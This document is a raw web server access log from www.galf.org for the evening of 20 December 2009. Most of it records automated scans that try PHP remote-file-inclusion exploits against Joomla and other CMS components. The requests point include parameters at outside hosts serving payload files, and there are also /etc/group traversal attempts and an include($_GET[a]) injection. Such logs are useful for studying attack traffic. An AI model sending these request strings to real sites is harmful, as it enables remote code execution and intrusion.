190.152.145.54 - - [20/Dec/2009:23:12:58 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:12:58 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:12:59 -0800] "GET /logs/access_091109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:12:59 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:12:59 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:13:25 -0800] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:23:13:36 -0800] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:23:14:23 -0800] "GET /logs/access.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.98 - - [20/Dec/2009:23:16:42 -0800] "GET /labia/?D=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:18:29 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:18:29 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:18:32 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:18:51 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:18:52 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:18:56 -0800] "GET /logs/access.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [20/Dec/2009:23:24:34 -0800] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:23:24:34 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:23:25:26 -0800] "GET /modules/My_eGallery/index.php?basepath=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:23:25:26 -0800] "GET /modules/My_eGallery/index.php?basepath=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:31 -0800] "GET /SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:31 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:31 -0800] "GET /logs/access.log%20%20/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:35 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:35 -0800] "GET /SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:35 -0800] "GET /logs/access.log%20%20/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:39 -0800] "GET /SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:39 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:39 -0800] "GET /logs/access.log%20%20/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:57 -0800] "GET /SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:57 -0800] "GET /logs/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:23:27:58 -0800] "GET /logs/access.log%20%20/SQuery/lib/gore.php?libpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.231.1.32 - - [20/Dec/2009:23:28:11 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:28:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:28:12 -0800] "GET /logs/access_090706.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:29:00 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:29:00 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:23:29:00 -0800] "GET /logs/access_090706.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:23:30:17 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.16.239.36 - - [20/Dec/2009:23:30:17 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:31:18 -0800] "GET /logs/access_091123.log%20%20/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:31:18 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:31:19 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:36:17 -0800] "GET /logs/access_090713.log%20%20/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:41:48 -0800] "GET /logs/access_090914.log%20%20/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:41:48 -0800] "GET /logs/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:41:48 -0800] "GET /?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:42:05 -0800] "GET /logs/access_091123.log%20%20/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:42:31 -0800] "GET /logs/access_090914.log/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:42:31 -0800] "GET /?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:42:31 -0800] "GET /logs/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:23:42:42 -0800] "GET /logs/access_091123.log/?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:23:44:36 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:23:44:36 -0800] "GET /logs/access_090504.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:45:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:45:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:47:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:47:22 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:47:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:48:27 -0800] "GET /logs/access_090525.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:46 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:46 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:46 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:48 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:49 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:49 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:52 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:52 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:53 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:56 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:56 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:56 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:57 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:57 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:48:57 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:49:35 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:49:35 -0800] "GET /logs/access_090706.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:49:35 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:23:49:52 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:49:59 -0800] "GET /logs/access_090525.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:56 -0800] "GET /logs/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:57 -0800] "GET /logs/access_090921.log/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:57 -0800] "GET /main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:57 -0800] "GET /logs/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:57 -0800] "GET /logs/access_090921.log/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:50:57 -0800] "GET /main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:21 -0800] "GET /logs/access_090706.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:38 -0800] "GET /logs/access_090706.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:39 -0800] "GET /logs/access_091109.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.105.207.244 - - [20/Dec/2009:23:51:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://moneual.co.kr/jb/session/members/AK1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.41 - - [20/Dec/2009:23:51:55 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; SpamBlockerUtility 4.8.5)" "galf.org"
67.19.51.194 - - [20/Dec/2009:23:52:34 -0800] "GET /homepage.php?sel=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:52:34 -0800] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:52:34 -0800] "GET /logs/homepage.php?sel=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:52:41 -0800] "GET /logs/access_090629.log/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:23:52:42 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:52:53 -0800] "GET /logs/access_090629.log/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:52:57 -0800] "GET /logs/access_090803.log/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:52:57 -0800] "GET /logs/access_090831.log/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:52:57 -0800] "GET /index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:52:57 -0800] "GET /logs/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:52:59 -0800] "GET /homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:52:59 -0800] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:52:59 -0800] "GET /logs/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:53:04 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:53:10 -0800] "GET /logs/access_090608.log%20%20/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:53:10 -0800] "GET /homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:53:10 -0800] "GET /logs/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:23:53:18 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://www.ezonplaza.com/img/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:53:21 -0800] "GET /logs/access_090706.log/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:53:21 -0800] "GET /index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.18.20.210 - - [20/Dec/2009:23:53:21 -0800] "GET /logs/index2.php?x=http://www.harrisonimplantdentist.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:32 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:32 -0800] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:32 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:53:43 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:53:43 -0800] "GET /logs/access_090525.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:53:43 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.26.26 - - [20/Dec/2009:23:53:48 -0800] "GET /logs/access_090706.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.almagrario.com.co///uploads/.../etenid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:48 -0800] "GET /logs/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:48 -0800] "GET /main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:53:49 -0800] "GET /logs/access_090921.log%20%20/main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:23:54:01 -0800] "GET /main.php?x=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
